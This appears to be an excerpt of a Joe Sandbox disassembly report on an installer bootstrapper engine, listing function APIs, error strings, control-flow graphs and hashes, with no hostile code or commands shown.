                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                                                                                                                                    • String ID: *.*$DEL$dirutil.cpp
                                                                                                                                                                    • API String ID: 1544372074-1252831301
                                                                                                                                                                    • Opcode ID: 49862e843f39dd1457f1c7e3389adfe2e0513d7133070168c3017825a4e2c677
                                                                                                                                                                    • Instruction ID: 4d60bec9881b9fd38b585ca1e757fe3f99778cc9b82ebef7516e468001966860
                                                                                                                                                                    • Opcode Fuzzy Hash: 49862e843f39dd1457f1c7e3389adfe2e0513d7133070168c3017825a4e2c677
                                                                                                                                                                    • Instruction Fuzzy Hash: 13B1D673D452399FEB305A658C05BAAB67DAF40720F0182A5EF08BB1D0D776DE90DA90
                                                                                                                                                                    Function 00905195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 976 905195-905243 call 92f8e0 * 2 GetModuleHandleW call 9404f8 call 9406ae call 90120a 987 905245 976->987 988 905259-90526a call 9042d7 976->988 989 90524a-905254 call 940237 987->989 994 905273-90528f call 905618 CoInitializeEx 988->994 995 90526c-905271 988->995 996 9054d4-9054db 989->996 1004 905291-905296 994->1004 1005 905298-9052a4 call 93fcae 994->1005 995->989 998 9054e8-9054ea 996->998 999 9054dd-9054e3 call 945636 996->999 1002 9054fa-905518 call 90d82f call 91a8d6 call 91ab24 998->1002 1003 9054ec-9054f3 998->1003 999->998 1025 905546-905559 call 904fa4 1002->1025 1026 90551a-905522 1002->1026 1003->1002 1006 9054f5 call 9141ec 1003->1006 1004->989 1013 9052a6 1005->1013 1014 9052b8-9052c7 call 940e07 1005->1014 1006->1002 1016 9052ab-9052b3 call 940237 1013->1016 1023 9052d0-9052df call 942af7 1014->1023 1024 9052c9-9052ce 1014->1024 1016->996 1032 9052e1-9052e6 1023->1032 1033 9052e8-9052f7 call 943565 1023->1033 1024->1016 1037 905560-905567 1025->1037 1038 90555b call 943a35 1025->1038 1026->1025 1028 905524-905527 1026->1028 1028->1025 1031 905529-905544 call 91434c call 905602 1028->1031 1031->1025 1032->1016 1044 905300-90531f GetVersionExW 1033->1044 1045 9052f9-9052fe 1033->1045 1040 905569 call 942efe 1037->1040 1041 90556e-905575 1037->1041 1038->1037 1040->1041 1047 905577 call 941479 1041->1047 1048 90557c-905583 1041->1048 1050 905321-90532b GetLastError 1044->1050 1051 905359-90539e call 9033c7 call 905602 1044->1051 1045->1016 1047->1048 1053 905585 call 93fdbd 1048->1053 1054 90558a-90558c 1048->1054 1056 905338 1050->1056 1057 90532d-905336 1050->1057 1079 9053a0-9053ab call 945636 1051->1079 1080 9053b1-9053c1 call 91752a 1051->1080 1053->1054 1060 905594-90559b 1054->1060 1061 90558e CoUninitialize 1054->1061 1062 90533a 1056->1062 1063 90533f-905354 call 903821 1056->1063 1057->1056 1065 9055d6-9055df call 940113 1060->1065 1066 90559d-90559f 1060->1066 1061->1060 1062->1063 1063->1016 1077 9055e1 call 9045ee 1065->1077 1078 9055e6-9055ff call 940802 call 92e06f 1065->1078 1070 9055a1-9055a3 1066->1070 1071 9055a5-9055ab 1066->1071 1072 9055ad-9055c6 call 913d85 call 905602 1070->1072 1071->1072 1072->1065 1095 9055c8-9055d5 call 905602 1072->1095 1077->1078 1079->1080 1092 9053c3 1080->1092 1093 9053cd-9053d6 1080->1093 1092->1093 1096 9053dc-9053df 1093->1096 1097 90549e-9054ab call 904d39 1093->1097 1095->1065 1100 9053e5-9053e8 1096->1100 1101 905476-905492 call 904ae5 1096->1101 1102 9054b0-9054b4 1097->1102 1104 9053ea-9053ed 1100->1104 1105 90544e-90546a call 9048ef 1100->1105 1107 9054c0-9054d2 1101->1107 1117 905494 1101->1117 1102->1107 1108 9054b6 1102->1108 1110 905426-905442 call 904a88 1104->1110 1111 9053ef-9053f2 1104->1111 1105->1107 1119 90546c 1105->1119 1107->996 1108->1107 1110->1107 1121 905444 1110->1121 1115 905403-905416 call 904c86 1111->1115 1116 9053f4-9053f9 1111->1116 1115->1107 1123 90541c 1115->1123 1116->1115 1117->1097 1119->1101 1121->1105 1123->1110
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00905217
                                                                                                                                                                      • Part of subcall function 009404F8: InitializeCriticalSection.KERNEL32(0096B5FC,?,00905223,00000000,?,?,?,?,?,?), ref: 0094050F
                                                                                                                                                                      • Part of subcall function 0090120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0090523F,00000000,?), ref: 00901248
                                                                                                                                                                      • Part of subcall function 0090120A: GetLastError.KERNEL32(?,?,?,0090523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00901252
                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00905285
                                                                                                                                                                      • Part of subcall function 00940E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00940E28
                                                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00905317
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00905321
                                                                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0090558E
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to initialize Wiutil., xrefs: 009052E1
                                                                                                                                                                    • Failed to run per-user mode., xrefs: 00905494
                                                                                                                                                                    • Failed to initialize Regutil., xrefs: 009052C9
                                                                                                                                                                    • 3.11.1.2318, xrefs: 00905384
                                                                                                                                                                    • Failed to run untrusted mode., xrefs: 009054B6
                                                                                                                                                                    • Failed to initialize XML util., xrefs: 009052F9
                                                                                                                                                                    • Failed to initialize Cryputil., xrefs: 009052A6
                                                                                                                                                                    • Failed to run per-machine mode., xrefs: 0090546C
                                                                                                                                                                    • Failed to parse command line., xrefs: 00905245
                                                                                                                                                                    • Failed to initialize engine state., xrefs: 0090526C
                                                                                                                                                                    • Failed to run RunOnce mode., xrefs: 0090541C
                                                                                                                                                                    • Invalid run mode., xrefs: 009053F9
                                                                                                                                                                    • Failed to run embedded mode., xrefs: 00905444
                                                                                                                                                                    • Failed to initialize core., xrefs: 009053C3
                                                                                                                                                                    • Failed to get OS info., xrefs: 0090534F
                                                                                                                                                                    • Failed to initialize COM., xrefs: 00905291
                                                                                                                                                                    • engine.cpp, xrefs: 00905345
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                                                                                                                    • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                                                                                                                                    • API String ID: 3262001429-510904028
                                                                                                                                                                    • Opcode ID: e93bfc69473d725665b656b8bba1e487ceca03da935a8b235a104321b688b464
                                                                                                                                                                    • Instruction ID: 3a49afb5f58a0bf44be9fba8ece2fcf5b75489938182ad88e64f5ff959228721
                                                                                                                                                                    • Opcode Fuzzy Hash: e93bfc69473d725665b656b8bba1e487ceca03da935a8b235a104321b688b464
                                                                                                                                                                    • Instruction Fuzzy Hash: 2BB1A372D40A299FDB31AF64CC46FEE76B9AF84714F020195F908A62D1DB749E80CF91
                                                                                                                                                                    Function 0094304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00943609,00000000,?,00000000), ref: 00943069
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0092C025,?,00905405,?,00000000,?), ref: 00943075
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 009430B5
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009430C1
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 009430CC
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009430D6
                                                                                                                                                                    • CoCreateInstance.OLE32(0096B6B8,00000000,00000001,0094B818,?,?,?,?,?,?,?,?,?,?,?,0092C025), ref: 00943111
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 009431C0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                                    • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                                                                    • API String ID: 2124981135-499589564
                                                                                                                                                                    • Opcode ID: 5b62db348dd600be83160ebc7fd40468c500a2c56d1cb059692bf7c500cea689
                                                                                                                                                                    • Instruction ID: 1769c4d0c8a78d9e07011aeb4c1ca89c296a2dcb1cf5d5f5732b41d0b67820db
                                                                                                                                                                    • Opcode Fuzzy Hash: 5b62db348dd600be83160ebc7fd40468c500a2c56d1cb059692bf7c500cea689
                                                                                                                                                                    • Instruction Fuzzy Hash: 5B41AC35B05315ABDB24DFB8C895FAEB7B8AF49710F118168E901EB250DBB1DE40CB90
                                                                                                                                                                    Function 00901070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 009033C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,009010DD,?,00000000), ref: 009033E8
                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 009010F6
                                                                                                                                                                      • Part of subcall function 00901175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 00901186
                                                                                                                                                                      • Part of subcall function 00901175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 00901191
                                                                                                                                                                      • Part of subcall function 00901175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0090119F
                                                                                                                                                                      • Part of subcall function 00901175: GetLastError.KERNEL32(?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 009011BA
                                                                                                                                                                      • Part of subcall function 00901175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009011C2
                                                                                                                                                                      • Part of subcall function 00901175: GetLastError.KERNEL32(?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 009011D7
                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,?,?,0094B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00901131
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                                                                                                                    • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                                                                                                                    • API String ID: 3687706282-3151496603
                                                                                                                                                                    • Opcode ID: b965b5306e004c68a093b098137bf6a1c929f2a7a5ecb05b3942e54507807c59
                                                                                                                                                                    • Instruction ID: 5564ed8aca69249b09f7d78941fe1eba622b561a5ae05c6e8516f30fe8c1298d
                                                                                                                                                                    • Opcode Fuzzy Hash: b965b5306e004c68a093b098137bf6a1c929f2a7a5ecb05b3942e54507807c59
                                                                                                                                                                    • Instruction Fuzzy Hash: 1F215A7190421CAFDB609FA4DC45FEEBBB9AF49724F504119FA10B72D1D7709904CBA4
                                                                                                                                                                    Function 0091A0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed create working folder., xrefs: 0091A0EE
                                                                                                                                                                    • Failed to copy working folder., xrefs: 0091A116
                                                                                                                                                                    • Failed to calculate working folder to ensure it exists., xrefs: 0091A0D8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                                                                    • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                                                    • API String ID: 3841436932-2072961686
                                                                                                                                                                    • Opcode ID: d4613fe95cb8b8815607cd4ae609e6d7ecf7138f999caaa3986775fb12ee1480
                                                                                                                                                                    • Instruction ID: 485419bcb3042f13ebbee5d8b996db54e6d92f7de7b4d56a774a959a35ffcabb
                                                                                                                                                                    • Opcode Fuzzy Hash: d4613fe95cb8b8815607cd4ae609e6d7ecf7138f999caaa3986775fb12ee1480
                                                                                                                                                                    • Instruction Fuzzy Hash: EF01D432A0A52CFB8B229B55DC06DEEBB79DFD5720B204256F800B6210DB319E80A781
                                                                                                                                                                    Function 009348D8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,009348AE,00000000,00967F08,0000000C,00934A05,00000000,00000002,00000000), ref: 009348F9
                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,009348AE,00000000,00967F08,0000000C,00934A05,00000000,00000002,00000000), ref: 00934900
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00934912
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                    • Opcode ID: 4b78e72cf0999e89b9531595053b182f8b37a39fd051ddc91d20c5b60cbe0704
                                                                                                                                                                    • Instruction ID: 932593f8f79b2e76ddbddc5cd2dcafbd38c81888ba5a23213215da474a5c9e27
                                                                                                                                                                    • Opcode Fuzzy Hash: 4b78e72cf0999e89b9531595053b182f8b37a39fd051ddc91d20c5b60cbe0704
                                                                                                                                                                    • Instruction Fuzzy Hash: ECE0B635415248ABCF11AF55DD09F5A3B69EF86B85F014014F8198A132CB35ED52DE80
                                                                                                                                                                    Function 0090394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1357844191-0
                                                                                                                                                                    • Opcode ID: 973076f48228b5003903e91b8d1be41be5d019051aa43d990d2e705fea4b7a68
                                                                                                                                                                    • Instruction ID: 762bced2efefc0549248273999a6398dd3d35630ba3b84b59e3c946df49d5d98
                                                                                                                                                                    • Opcode Fuzzy Hash: 973076f48228b5003903e91b8d1be41be5d019051aa43d990d2e705fea4b7a68
                                                                                                                                                                    • Instruction Fuzzy Hash: 40C012361AC20CAB8B006FF8EC0EC9A3BACBB296027048400B905C2120C738E010AB60
                                                                                                                                                                    Function 0090DF33 Relevance: 126.6, APIs: 11, Strings: 61, Instructions: 646COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0090E058
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0090E736
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeHeapString$AllocateProcess
                                                                                                                                                                    • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`<u$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
                                                                                                                                                                    • API String ID: 336948655-2953049543
                                                                                                                                                                    • Opcode ID: 83d43a41ca9250af6fe72487c184e7a54223e98b52c0414ca7b7fbde821a853a
                                                                                                                                                                    • Instruction ID: 701e5463fe98625239dafc16f6bd322809c6d3a15530536e52e7f8cd8c9d8575
                                                                                                                                                                    • Opcode Fuzzy Hash: 83d43a41ca9250af6fe72487c184e7a54223e98b52c0414ca7b7fbde821a853a
                                                                                                                                                                    • Instruction Fuzzy Hash: B632D231D4522AEFCB11DFA4CC42FAEBAB4AF84725F104A65F910BB2D0D775AD009B90
                                                                                                                                                                    Function 0090F9E3 Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 446COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 222 90f9e3-90fa14 call 9439af 225 90fa16 222->225 226 90fa18-90fa1a 222->226 225->226 227 90fa1c-90fa29 call 940237 226->227 228 90fa2e-90fa47 call 9432f3 226->228 233 90ff16-90ff1b 227->233 234 90fa53-90fa68 call 9432f3 228->234 235 90fa49-90fa4e 228->235 236 90ff23-90ff28 233->236 237 90ff1d-90ff1f 233->237 246 90fa74-90fa81 call 90ea42 234->246 247 90fa6a-90fa6f 234->247 238 90ff0d-90ff14 call 940237 235->238 240 90ff30-90ff35 236->240 241 90ff2a-90ff2c 236->241 237->236 249 90ff15 238->249 244 90ff37-90ff39 240->244 245 90ff3d-90ff41 240->245 241->240 244->245 250 90ff43-90ff46 call 945636 245->250 251 90ff4b-90ff52 245->251 255 90fa83-90fa88 246->255 256 90fa8d-90faa2 call 9432f3 246->256 247->238 249->233 250->251 255->238 259 90faa4-90faa9 256->259 260 90faae-90fac0 call 944c97 256->260 259->238 263 90fac2-90faca 260->263 264 90facf-90fae4 call 9432f3 260->264 265 90fd99-90fda2 call 940237 263->265 269 90faf0-90fb05 call 9432f3 264->269 270 90fae6-90faeb 264->270 265->249 274 90fb11-90fb23 call 943505 269->274 275 90fb07-90fb0c 269->275 270->238 278 90fb25-90fb2a 274->278 279 90fb2f-90fb45 call 9439af 274->279 275->238 278->238 282 90fdf4-90fe0e call 90ecbe 279->282 283 90fb4b-90fb4d 279->283 290 90fe10-90fe15 282->290 291 90fe1a-90fe32 call 9439af 282->291 284 90fb59-90fb6e call 943505 283->284 285 90fb4f-90fb54 283->285 292 90fb70-90fb75 284->292 293 90fb7a-90fb8f call 9432f3 284->293 285->238 290->238 298 90fe38-90fe3a 291->298 299 90fefc-90fefd call 90f0f8 291->299 292->238 300 90fb91-90fb93 293->300 301 90fb9f-90fbb4 call 9432f3 293->301 302 90fe46-90fe64 call 9432f3 298->302 303 90fe3c-90fe41 298->303 308 90ff02-90ff06 299->308 300->301 305 90fb95-90fb9a 300->305 312 90fbc4-90fbd9 call 9432f3 301->312 313 90fbb6-90fbb8 301->313 314 90fe70-90fe88 call 9432f3 302->314 315 90fe66-90fe6b 302->315 303->238 305->238 308->249 311 90ff08 308->311 311->238 323 90fbe9-90fbfe call 9432f3 312->323 324 90fbdb-90fbdd 312->324 313->312 316 90fbba-90fbbf 313->316 321 90fe95-90fead call 9432f3 314->321 322 90fe8a-90fe8c 314->322 315->238 316->238 333 90feba-90fed2 call 9432f3 321->333 334 90feaf-90feb1 321->334 322->321 325 90fe8e-90fe93 322->325 331 90fc00-90fc02 323->331 332 90fc0e-90fc23 call 9432f3 323->332 324->323 326 90fbdf-90fbe4 324->326 325->238 326->238 331->332 336 90fc04-90fc09 331->336 343 90fc33-90fc48 call 9432f3 332->343 344 90fc25-90fc27 332->344 341 90fed4-90fed9 333->341 342 90fedb-90fef3 call 9432f3 333->342 334->333 335 90feb3-90feb8 334->335 335->238 336->238 341->238 342->299 350 90fef5-90fefa 342->350 351 90fc58-90fc6d call 9432f3 343->351 352 90fc4a-90fc4c 343->352 344->343 346 90fc29-90fc2e 344->346 346->238 350->238 356 90fc7d-90fc92 call 9432f3 351->356 357 90fc6f-90fc71 351->357 352->351 353 90fc4e-90fc53 352->353 353->238 361 90fca2-90fcba call 9432f3 356->361 362 90fc94-90fc96 356->362 357->356 358 90fc73-90fc78 357->358 358->238 366 90fcca-90fce2 call 9432f3 361->366 367 90fcbc-90fcbe 361->367 362->361 363 90fc98-90fc9d 362->363 363->238 371 90fcf2-90fd07 call 9432f3 366->371 372 90fce4-90fce6 366->372 367->366 368 90fcc0-90fcc5 367->368 368->238 376 90fda7-90fda9 371->376 377 90fd0d-90fd2a CompareStringW 371->377 372->371 374 90fce8-90fced 372->374 374->238 378 90fdb4-90fdb6 376->378 379 90fdab-90fdb2 376->379 380 90fd34-90fd49 CompareStringW 377->380 381 90fd2c-90fd32 377->381 382 90fdc2-90fdda call 943505 378->382 383 